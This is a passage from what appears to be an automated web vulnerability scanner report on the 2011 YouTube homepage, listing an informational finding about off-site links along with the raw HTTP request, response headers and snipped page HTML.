button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="I DID HIM" data-thumb="//i1.ytimg.com/vi/87xLrWV6pFs/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/23');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Live VIDEO High Roller Commentary by WhiteBoy7thst Gun Game" data-thumb="//i2.ytimg.com/vi/-dl1fSya324/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/2');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="I DID HIM" data-thumb="//i1.ytimg.com/vi/87xLrWV6pFs/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/0%26s%3Dmp');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Imagination Is Everything" data-thumb="//i3.ytimg.com/vi/vrulLtPTcjw/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/0%26s%3Dmf');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<a class="large-thumb" title="Breaking and entering - Cheeky Monkey - BBC" href="/watch?v=o-afhO-QPXc&amp;feature=fvhr">
<img src="http://i4.ytimg.com/vi/o-afhO-QPXc/hqdefault.jpg" alt="Breaking and entering - Cheeky Monkey - BBC">
</a>
...[SNIP]...
<span class="watch-video-label">
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="master-sprite">
Watch this video
</span>
...[SNIP]...
<span class="promoted-label">
<a href="http://www.google.com/support/youtube/bin/answer.py?hl=en&answer=143421">Featured Video</a>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i2.ytimg.com/vi/EAc4zHEDd7o/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i3.ytimg.com/vi/B5uHegwQvyM/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i2.ytimg.com/vi/qMxX-QOV9tI/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i2.ytimg.com/vi/esMIVBJkTgs/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i4.ytimg.com/vi/CcO53ZNe2Ng/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i1.ytimg.com/vi/Hw5BxgztvVQ/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<h3><a href="http://youtube-global.blogspot.com/2010/10/1-billion-subscriptions-and-counting.html">Subscription Widget</a>
...[SNIP]...
<h3>
<a href="http://youtubeukblog.blogspot.com/">Share and share alike: we...ve acquired Fflick</a>
...[SNIP]...
<p class="alignR">
<a href="http://youtubeukblog.blogspot.com/">Read more in our Blog</a>
...[SNIP]...
<li><a href="http://code.google.com/apis/youtube/overview.html">Developers</a>
...[SNIP]...
<li><a href="http://www.google.com/support/youtube/bin/static.py?p=homepage&amp;page=start.cs&amp;hl=en_US" onmousedown="yt.analytics.trackEvent('Footer', 'link', 'Help');">Help</a>
...[SNIP]...
<li><a href="http://www.google.com/support/youtube/bin/request.py?contact_type=abuse&amp;hl=en_US" onmousedown="yt.analytics.trackEvent('Footer', 'link', 'Safety');">Safety</a>
...[SNIP]...
</span>

<a href="http://www.google.com/tools/feedback/intl/en/error.html" onclick="return yt.www.feedback.start('en', {&quot;accept_language&quot;: &quot;en&quot;});" id="reportbug">Report a bug</a>
...[SNIP]...
<div id="quicklist-player-close"><img onclick="yt.www.navigation.expandPlayer();" class="master-sprite expand-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"><img onclick="yt.www.navigation.closePlayer();" class="master-sprite close-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"></div>
...[SNIP]...
<div id="quicklist-notifications" style="display: none;" class="yt-alert yt-alert-success yt-alert-small yt-alert-naked yt-rounded">
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="icon master-sprite" alt="Alert icon">

<div class="yt-alert-content">
...[SNIP]...
pe="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked start start-edge yt-uix-button yt-uix-tooltip" onclick=";return false;" title="Previous video" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-prev" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button><button type="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked end yt-uix-button" onclick=";return false;" id="quicklist-next-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-next" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
ist-play-button" type="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked yt-uix-button yt-uix-tooltip" onclick=";return false;" title="Play videos" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-play" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
</span> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""><div style="display:none;" class="yt-uix-button-menu">
...[SNIP]...
aster-sprite yt-uix-tooltip yt-uix-tooltip-masked start quicklist-active yt-uix-button yt-uix-button-toggle" onclick=";return false;" id="quicklist-autoplay-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-autoplay" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
master-sprite yt-uix-tooltip yt-uix-tooltip-masked start quicklist-active yt-uix-button yt-uix-button-toggle" onclick=";return false;" id="quicklist-shuffle-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-shuffle" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button><button type="button" class="master-sprite yt-uix-tooltip yt-uix-tooltip-masked end end-edge yt-uix-button" onclick=";return false;" id="quicklist-toggle-button" role="button" aria-pressed="false"><img class="yt-uix-button-icon-quicklist-toggle" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>
...[SNIP]...
<button class="yt-uix-button quicklist-tray-button yt-uix-slider-prev" onclick="return false;"><img class="yt-uix-slider-prev-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Previous"></button><button class="yt-uix-button quicklist-tray-button yt-uix-slider-next" onclick="return false;"><img class="yt-uix-slider-next-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Next"></button>
...[SNIP]...
<li class="empty quicklist-help-message">Your queue is empty. Add videos to your queue using this button: <img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="addto-button-help"><br> or <a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F%253Fq%253Dbluefin%252Btuna%2526hl%253Den%2526tab%253Dn1&amp;hl=en_US&amp;ltmpl=sso">sign in</a>
...[SNIP]...
<div id="quicklist-loading"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Loading..."><span id="quicklist-loading-message">
...[SNIP]...
<span class="yt-uix-button-menu-item " onclick="">
<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F%253Fq%253Dbluefin%252Btuna%2526hl%253Den%2526tab%253Dn1&amp;hl=en_US&amp;ltmpl=sso">Sign in</a>
...[SNIP]...

16.160. http://www.youtube.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?q=bluefin+tuna&hl=en&tab=n1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:42 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=mvtFrDNi-ho; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 01:17:42 GMT
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 01:17:42 GMT
Set-Cookie: GEO=6f524a5d4479091d5f7b3cf435ef185ecwsAAAAzR0KtwdbzTUoCNg==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nUXNCUHlydnptdzlSME5DMW1wVV9hRG5xY1FNQVlxUE5TU3JxemxZd2kwRVlrVkNMMlJYWmlR -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
</title>

<link id="www-core-css" rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-core-vflRgLmpq.css">


<style type="text/css">
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" href="http://www.youtube.com/opensearch?locale=en_US" title="YouTube Video Search">
<link rel="icon" href="//s.ytimg.com/yt/favicon-vflZlzSbU.ico" type="image/x-icon">
<link rel="shortcut icon" href="//s.ytimg.com/yt/favicon-vflZlzSbU.ico" type="image/x-icon">
<link rel="canonical" href="/?gl=GB&amp;hl=en">
...[SNIP]...
</script>

<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vflWd9JKd.js"></script>
...[SNIP]...
<a href="/" title="YouTube home">
<img id="logo" class="master-sprite" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="YouTube home">
</a>
...[SNIP]...
</a>

<a class="start" href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account%3Fnext%3D%252F%253Fq%253Dbluefin%252Btuna%2526hl%253Den%2526tab%253Dn1&amp;ltmpl=sso&amp;service=youtube&amp;hl=en_US">Create Account</a><a class="end" href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F%253Fq%253Dbluefin%252Btuna%2526hl%253Den%2526tab%253Dn1&amp;hl=en_US&amp;ltmpl=sso">Sign In</a>
...[SNIP]...
</a><img alt="Close" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" onclick="_hidediv('default-language-box');"></div>
...[SNIP]...
</span>
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="master-sprite">
</a>
...[SNIP]...
<div id="ad_creative_1" class="ad-div mastad" style="z-index: 1;">
<iframe id="ad_creative_iframe_1" src="http://ad-emea.doubleclick.net/adi/com.ythome/_default;sz=970x250,960x250;klg=en;kt=K;kga=-1;kgg=-1;kcr=gb;dc_dedup=1;kmyd=ad_creative_1;tile=1;dcopt=ist;ord=9087733479642826?" height="250" width="970" scrolling="no" frameborder="0" style="z-index: 1" id="homepagetop" onload="yt.www.home.ads.workaroundLoad()" onmouseover="yt.www.home.ads.workaroundIE(this)" onfocus="yt.www.home.ads.workaroundIE(this)"></iframe>
...[SNIP]...
</span>
<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&amp;hl=en_US&amp;ltmpl=sso">Sign In</a>
...[SNIP]...
<div class="opt-box-top">
<img class="homepage-sprite img-php-opt-box-caret" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" />
</div>
...[SNIP]...
<div class="opt-close opt-close-button" onclick="moduleHelper.closeOptionsPane('SLN')"><img class="img-php-close-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"/></div>
...[SNIP]...
<div id="SLN-loading-icn" class="opt-loading-icn" style="display: none;">
<img width="16" id="SLN-loading-icn-image" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" image="//s.ytimg.com/yt/img/icn_loading_animated-vflff1Mjj.gif">
</div>
...[SNIP]...
<div class="opt-simple-msg">
Want to customize this homepage?

<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&hl=en_US&ltmpl=sso" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignIn/EditModuleBox');">Sign In</a> or <a href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account&ltmpl=sso&service=youtube&hl=en_US" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignUp/EditModuleBox');">Sign Up</a>
...[SNIP]...
<span class="clip"><img src="http://i3.ytimg.com/vi/bIu2d7pkghs/market_thumb.jpg?v=acb52f" alt="Thumbnail" class="" title="Big Fat Gypsy Weddings" ></span>
...[SNIP]...
<span class="clip"><img src="http://i4.ytimg.com/vi/CkN56-dnQYU/market_thumb.jpg?v=acd1e8" alt="Thumbnail" class="" title="The Joy of Teen Sex" ></span>
...[SNIP]...
<span class="clip"><img src="http://i4.ytimg.com/vi/W2JBsWkOZpM/market_thumb.jpg?v=a3f6b7" alt="Thumbnail" class="" title="Neighbours" ></span>
...[SNIP]...
<span class="clip"><img src="http://i2.ytimg.com/vi/U0Z5Ja9jCsk/market_thumb.jpg?v=a0a10f" alt="Thumbnail" class="" title="Jamie's 30 Minute Meals" ></span>
...[SNIP]...
<span class="clip"><img src="http://i4.ytimg.com/vi/3olnBX18Ras/market_thumb.jpg?v=8026ad" alt="Thumbnail" class="" title="Come Dine with Me" ></span>
...[SNIP]...
<span class="clip"><img src="http://i4.ytimg.com/vi/o07LAWQyo2w/market_thumb.jpg?v=a3f609" alt="Thumbnail" class="" title="Home And Away" ></span>
...[SNIP]...
<span class="clip"><img src="http://i3.ytimg.com/vi/J3NMkjE6PY0/market_thumb.jpg?v=833da7" alt="Thumbnail" class="" title="Deal or No Deal" ></span>
...[SNIP]...
<span class="clip"><img src="http://i4.ytimg.com/vi/CMQrDzBxZLg/market_thumb.jpg?v=7eb933" alt="Thumbnail" class="" title="Hollyoaks" ></span>
...[SNIP]...
<div class="opt-box-top">
<img class="homepage-sprite img-php-opt-box-caret" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" />
</div>
...[SNIP]...
<div class="opt-close opt-close-button" onclick="moduleHelper.closeOptionsPane('REC')"><img class="img-php-close-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"/></div>
...[SNIP]...
<div id="REC-loading-icn" class="opt-loading-icn" style="display: none;">
<img width="16" id="REC-loading-icn-image" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" image="//s.ytimg.com/yt/img/icn_loading_animated-vflff1Mjj.gif">
</div>
...[SNIP]...
<div class="opt-simple-msg">
Want to customize this homepage?

<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&hl=en_US&ltmpl=sso" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignIn/EditModuleBox');">Sign In</a> or <a href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account&ltmpl=sso&service=youtube&hl=en_US" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignUp/EditModuleBox');">Sign Up</a>
...[SNIP]...
ointer; display:inline; float: right;" onclick="_hidediv('logged_out_rec_learn_more_box'); return false;" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/Rec_LearnMore_Close');"><img class="img-php-close-button master-sprite" style="background-position: -82px -712px;" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"/></div>
...[SNIP]...
<div style="color: black; padding-left: 5px; padding-right: 10px; margin-top: 10px;">
Remember, you will get better, more specific, and more consistent recommendations by <a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&amp;hl=en_US&amp;ltmpl=sso">logging in</a> (or <a href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account%3Fnext%3D%252F&amp;ltmpl=sso&amp;service=youtube&amp;hl=en_US">signing up</a>
...[SNIP]...
<div class="opt-box-top">
<img class="homepage-sprite img-php-opt-box-caret" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" />
</div>
...[SNIP]...
<div class="opt-close opt-close-button" onclick="moduleHelper.closeOptionsPane('TOP')"><img class="img-php-close-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"/></div>
...[SNIP]...
<div id="TOP-loading-icn" class="opt-loading-icn" style="display: none;">
<img width="16" id="TOP-loading-icn-image" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" image="//s.ytimg.com/yt/img/icn_loading_animated-vflff1Mjj.gif">
</div>
...[SNIP]...
<div class="opt-simple-msg">
Want to customize this homepage?

<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&hl=en_US&ltmpl=sso" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignIn/EditModuleBox');">Sign In</a> or <a href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account&ltmpl=sso&service=youtube&hl=en_US" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignUp/EditModuleBox');">Sign Up</a>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="The Sloppy Roethlisberger - Epic Meal Time" data-thumb="//i3.ytimg.com/vi/FCxFn3sAw68/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/24');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Photoshop Tutorial Rap" data-thumb="//i1.ytimg.com/vi/X71WXhOyWj8/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/10');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Paxman said a bad word!" data-thumb="//i4.ytimg.com/vi/WGjXA1GaWDI/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/25');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="3D Maestro" data-thumb="//i2.ytimg.com/vi/uMTvaNomlWY/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/1');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
